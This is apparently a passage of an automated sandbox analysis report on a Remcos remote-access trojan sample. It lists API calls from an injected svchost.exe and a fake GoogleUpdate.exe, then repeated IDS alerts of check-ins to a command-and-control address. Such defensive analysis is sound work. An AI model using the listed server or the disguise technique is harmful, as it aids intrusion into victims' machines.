                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D587A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,13_2_02D587A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D67AAB FindFirstFileW,FindNextFileW,FindNextFileW,13_2_02D67AAB
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D5AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,13_2_02D5AA71
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D568CD FindFirstFileW,FindNextFileW,13_2_02D568CD
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D57848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,13_2_02D57848
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D5AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,13_2_02D5AC78
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,15_2_0041A01B
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,15_2_0040B28E
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_0040838E
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_004087A0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,15_2_00407848
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_004068CD FindFirstFileW,FindNextFileW,15_2_004068CD
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_0044BA59 FindFirstFileExA,15_2_0044BA59
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,15_2_0040AA71
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,15_2_00417AAB
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,15_2_0040AC78
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,18_2_0041A01B
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,18_2_0040B28E
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,18_2_0040838E
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,18_2_004087A0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,18_2_00407848
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_004068CD FindFirstFileW,FindNextFileW,18_2_004068CD
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,18_2_0040AA71
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,18_2_00417AAB
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,18_2_0040AC78
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,0_2_00406D28

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49734 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49739 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49757 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49735 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49737 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49760 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49740 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49766 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49765 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49746 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49762 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49763 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49807 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49769 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49774 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49777 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49788 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49778 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49748 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49773 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49742 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49744 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49802 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49792 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49771 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49803 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49824 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49741 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49732 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49815 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49755 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49791 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49842 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49784 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49745 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49840 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49783 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49822 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49793 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49761 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49847 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49781 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49849 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49775 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49768 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49747 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49770 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49832 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49841 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49787 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49798 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49789 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49795 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49779 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49870 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49780 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49859 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49873 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49759 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49767 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49808 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49838 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49811 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49884 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49883 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49860 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49804 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49826 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49878 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49888 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49831 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49861 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49871 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49814 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49799 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49749 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49874 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49872 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49809 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49892 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49797 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49897 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49906 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49903 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49810 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49868 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49743 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49910 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49800 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49801 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49790 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49882 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49934 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49938 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49942 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49894 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49833 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49945 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49949 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49813 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49951 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49918 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49957 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49886 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49751 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49927 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49913 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49786 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49772 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49946 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49965 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49823 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49973 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49975 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49964 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49796 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49785 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49914 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49850 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49794 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49992 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49990 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49994 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49944 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49996 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49806 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49997 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49969 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49901 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49852 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49862 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49919 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49885 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49937 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49911 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49978 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50022 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49764 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50025 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50024 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50027 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50033 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49982 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49908 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50035 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50011 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49920 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49943 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50037 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50007 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50046 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50034 -> 198.50.242.157:443
